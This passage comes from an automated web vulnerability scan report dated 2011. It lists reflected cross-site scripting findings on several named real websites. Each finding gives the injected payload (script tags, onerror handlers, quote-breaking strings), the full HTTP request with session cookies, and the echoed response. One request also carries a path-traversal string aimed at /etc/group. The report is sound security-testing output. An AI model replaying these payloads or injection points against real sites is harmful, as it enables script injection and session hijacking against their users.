The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e894a<script>alert(1)</script>28b51df7b70 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcases.html%3Faction%3DcaseDetail%26CaseID%3D102&g0rr6z HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 255
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 17:03:38 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 17:03:38 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219818.1EY; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:59:25 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 17:03:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 17:03:38 GMT
Connection: close

_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70({"urls":["http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/39CD8FF4-531A-4266-A340-45548C451F45/User/4dc048d9159e4ae3/gif"],"segments" : ["1EY"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="
...[SNIP]...

5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload af6a5<script>alert(1)</script>b51a3380c9e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 551
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:11:59 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:11:59 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216719.1FE|1305216719.1OD|1305216719.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:11:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:11:59 GMT
Connection: close

_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wi-ala.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d152<script>alert(1)</script>f8a0ec4641e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wi-ala.org/p.json?callback=_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2FNewsView.cfm%3FclubID%3D177%26NewsID%3D3733&ref=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2F&1krsxxj HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:10:13 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:10:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:10:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:10:13 GMT
Connection: close

_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.7. http://gigablast.com/ [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><script>alert(1)</script>b200ebb607f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz3217ce"><script>alert(1)</script>b200ebb607f HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:38 GMT
Date: Thu, 12 May 2011 15:16:13 GMT
Last-Modified: Thu, 12 May 2011 15:16:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz3217ce"><script>alert(1)</script>b200ebb607f">
...[SNIP]...

5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trac/js/ena.js

Issue detail

The value of the trkDomain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af87'%3balert(1)//7f2a306cc4e was submitted in the trkDomain parameter. This input was echoed as 3af87';alert(1)//7f2a306cc4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trac/js/ena.js?trkDomain=layserfreiwald.com3af87'%3balert(1)//7f2a306cc4e HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 12 May 2011 18:08:59 GMT
Content-Length: 10334


var ydlVisitTypeCookieTTL = 14; // days
var ydlVisitTypeCookieName = 'vt';
var ydlPUT = 'p';
var ydlUUT = 'u';

function matchURL(detectionKey) {
   if(detectionKey == null) return true;
   var u
...[SNIP]...
ator.platform,
           subString: "Linux",
           identity: "Linux"
       }
   ]

};

BrowserDetect.init();

var url = 'http://labs.natpal.com/trk/pixel?trackid=' +
    '&trkDomain=layserfreiwald.com3af87';alert(1)//7f2a306cc4e' +
    '&referrer=' + escape(document.referrer) +
    '&pageVisited=' + escape(location.href) +
    '&browser='     + escape(BrowserDetect.browser) +
    '&
...[SNIP]...

5.9. http://layserfreiwald.com/attorneys.html [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2 was submitted in the mode parameter. This input was echoed as d38d6<img src=a onerror=alert(1)>ef8373716d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /attorneys.html?mode=viewd38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 7592

ERROR - UNSUPPORTED MODE (viewd38d6<img src=a onerror=alert(1)>ef8373716d2)!
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns
...[SNIP]...

5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /publications/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93015"><script>alert(1)</script>40999349f56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications/?93015"><script>alert(1)</script>40999349f56=1 HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:00:49 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3820; path=/
Set-Cookie: PortletId=4737494; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 10504
Content-Length: 10504


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Publications


|
Perkins Coie Mobile Site
</title><meta name="viewport" c
...[SNIP]...
<a href="/publications/?93015"><script>alert(1)</script>40999349f56=1&amp;p=2"&gt;Next &gt;</a>
...[SNIP]...

5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74e0e<script>alert(1)</script>8e1c2fd2452 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:23 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 was not found on this server.</p>
...[SNIP]...

5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 855d4<script>alert(1)</script>ea1f5dd84b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:07 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 was not found on this server.</p>
...[SNIP]...

5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/PasswordRequest.jsp

Issue detail

The value of the startPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe694"><script>alert(1)</script>7999e454e36 was submitted in the startPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36 HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231772135:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:23:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U50D391B4].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22177

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Request Password</title>


<script src="/js/utility.js" type="text/javascript"></script>
<scr
...[SNIP]...
<input type="hidden" name="startPage" value="https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36">
...[SNIP]...

5.14. http://www.gigablast.com/ [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e50e"><script>alert(1)</script>057ece81203 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz31e50e"><script>alert(1)</script>057ece81203 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:29 GMT
Date: Thu, 12 May 2011 15:16:04 GMT
Last-Modified: Thu, 12 May 2011 15:16:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz31e50e"><script>alert(1)</script>057ece81203">
...[SNIP]...

5.15. http://www.gigablast.com/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e8"><script>alert(1)</script>502cfb23195 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ip%3A216.32.120%20cars865e8"><script>alert(1)</script>502cfb23195&n=10&k0s=987832 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1542
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:03 GMT
Last-Modified: Thu, 12 May 2011 15:16:03 GMT

<form method=get><input type=hidden name="q" value="ip:216.32.120 cars865e8"><script>alert(1)</script>502cfb23195">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see bel
...[SNIP]...

5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5cac9(a)30f8c3192d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?5cac9(a)30f8c3192d3=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?5cac9(a)30f8c3192d3\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 47960<script>alert(1)</script>9af43b57f58 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; OAID=ff33d9b426ad063f746675f34d885b06

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 231

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58*/

5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d3ba"><script>alert(1)</script>22db1e31600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news14300.html8d3ba"><script>alert(1)</script>22db1e31600 HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=93a13061659f5cd464d2764d04966966; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34892

...<?xml version="1.0" encoding="utf-8"?>
